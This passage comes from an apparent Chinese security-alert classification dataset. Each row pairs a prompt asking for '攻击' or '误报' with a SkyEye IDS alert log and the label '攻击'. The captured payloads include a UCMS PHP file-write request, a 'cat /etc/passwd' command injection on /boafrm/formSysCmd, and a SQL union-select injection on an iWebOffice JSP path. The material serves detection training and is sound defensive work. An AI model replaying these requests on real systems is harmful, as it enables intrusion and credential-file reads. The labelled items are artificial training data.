"serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 55\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n", "req_body": "uuu_token=&co=%3C%3fphp+echo+md5(42293)%3b%3f%3E&pos=17", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572564-UCMS 文件上传漏洞(CVE-2020-25483)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12139", "h_url": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688164, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 56, "uri": "/boafrm/formSysCmd", "dport": 30001, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 36, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 12141}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/boafrm/formSysCmd", "submit-url": "%2Fsyscmd.htm", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "3d9ef872bb5e7f1f21b117b10fbb46c5", "xff": "", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dport": "30001", "alert_devip": "172.31.191.57", "syscmd": "cat+%2Fetc%2Fpasswd", "update_time": "1732688144", "code_language": "其他", "public_date": "2018-04-03 17:04:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "56", "h_proto_version": "HTTP/1.1", "uri": "/boafrm/formSysCmd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001384", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "36", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYm9hZnJtL2Zvcm1TeXNDbWQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNjgNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c3lzQ21kPWNhdCslMkZldGMlMkZwYXNzd2QmYXBwbHk9QXBwbHkmc3VibWl0LXVybD0lMkZzeXNjbWQuaHRtJm1zZz0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_d9a968fef8cd75f7836212ac68cff9fc", "access_time": "2024-11-27 14:16:04", "content-length": "68", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/boafrm/formSysCmd", "src_mac": "00:94:a1:5e:6e:87", "apply": "Apply", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 68\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "sysCmd=cat+%2Fetc%2Fpasswd&apply=Apply&submit-url=%2Fsyscmd.htm&msg=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12141", "h_url": "/boafrm/formSysCmd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688164, "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 11, "uri": "/boafrm/formSysCmd", "dport": 30001, "vuln_name": "通用命令执行漏洞", "rsp_status": 0, "code_language": "通用", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": 0, "detail_info": "攻击者已经能够执行任意系统命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "攻击者已经能够执行任意系统命令。", "public_date": "2019-05-13 18:09:13", "sport": 12141}, "detail_info": "攻击者已经能够执行任意系统命令。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/boafrm/formSysCmd", "submit-url": "%2Fsyscmd.htm", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d1635aece35a8e9f7c4d0b1cd842f3e1", "xff": "", "vuln_desc": "攻击者已经能够执行任意系统命令。", "attack_chain": "0x02020000", "vuln_harm": "受害主机能被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。", "dport": "30001", "alert_devip": "172.31.191.57", "syscmd": "cat+%2Fetc%2Fpasswd", "update_time": "1732688144", "code_language": "通用", "public_date": "2019-05-13 18:09:13", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/boafrm/formSysCmd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100215d7", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "通用命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYm9hZnJtL2Zvcm1TeXNDbWQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNjgNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c3lzQ21kPWNhdCslMkZldGMlMkZwYXNzd2QmYXBwbHk9QXBwbHkmc3VibWl0LXVybD0lMkZzeXNjbWQuaHRtJm1zZz0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_69b7217aac4f49c149934ed7e5f0e956", "access_time": "2024-11-27 14:16:04", "content-length": "68", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/boafrm/formSysCmd", "src_mac": "00:94:a1:5e:6e:87", "apply": "Apply", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 68\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "sysCmd=cat+%2Fetc%2Fpasswd&apply=Apply&submit-url=%2Fsyscmd.htm&msg=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572119-通用命令执行漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12141", "h_url": "/boafrm/formSysCmd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688164, "vuln_harm": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 11, "uri": "/boafrm/formSysCmd", "dport": 30001, "vuln_name": "通用命令注入绕过攻击", "rsp_status": 0, "code_language": "", "solution": "修复漏洞", "hit_start": 0, "detail_info": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "public_date": "2022-07-20 15:40:30", "sport": 12141}, "detail_info": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/boafrm/formSysCmd", "submit-url": "%2Fsyscmd.htm", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "通用命令注入绕过攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "8eb1155c24939fd687e82504cccbbec5", "xff": "", "vuln_desc": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "attack_chain": "0x02020000", "vuln_harm": "为了逃避安全产品的检测,攻击者在利用命令执行漏洞的时候,会将攻击payload进行混淆处理。", "dport": "30001", "alert_devip": "172.31.191.57", "syscmd": "cat+%2Fetc%2Fpasswd", "update_time": "1732688144", "code_language": "", "public_date": "2022-07-20 15:40:30", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "11", "h_proto_version": "HTTP/1.1", "uri": "/boafrm/formSysCmd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021071", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "通用命令注入绕过攻击", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "修复漏洞", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYm9hZnJtL2Zvcm1TeXNDbWQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNjgNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c3lzQ21kPWNhdCslMkZldGMlMkZwYXNzd2QmYXBwbHk9QXBwbHkmc3VibWl0LXVybD0lMkZzeXNjbWQuaHRtJm1zZz0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_68f9c79c604312fc5c949bea054cf8f0", "access_time": "2024-11-27 14:16:04", "content-length": "68", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/boafrm/formSysCmd", "src_mac": "00:94:a1:5e:6e:87", "apply": "Apply", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 68\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "sysCmd=cat+%2Fetc%2Fpasswd&apply=Apply&submit-url=%2Fsyscmd.htm&msg=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570737-通用命令注入绕过攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12141", "h_url": "/boafrm/formSysCmd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688159", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688159, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 65, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "SQL注入(词法语法)", "rsp_status": 0, "code_language": "通用", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 45, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2019-10-18 10:02:18", "sport": 12127}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+md5('839481764')),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:15:59", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入(词法语法)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "0c834ea89e266ad5c96cd6752cfa6fc4", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688138", "code_language": "通用", "public_date": "2019-10-18 10:02:18", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "65", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002072c", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入(词法语法)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "45", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrbWQ1KCUyNzgzOTQ4MTc2NCUyNykpLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwtLSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a26776019a957230db5d282c662a3d49", "access_time": "2024-11-27 14:15:59", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568364-SQL注入(词法语法)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12127", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688159", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688159, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 123, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "SQL注入攻击", "rsp_status": 0, "code_language": "其他", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 103, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2018-08-08 12:00:00", "sport": 12127}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+md5('839481764')),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:15:59", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "3961ad2c6852d4a0c6e86a9b99ba0c58", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688138", "code_language": "其他", "public_date": "2018-08-08 12:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "123", 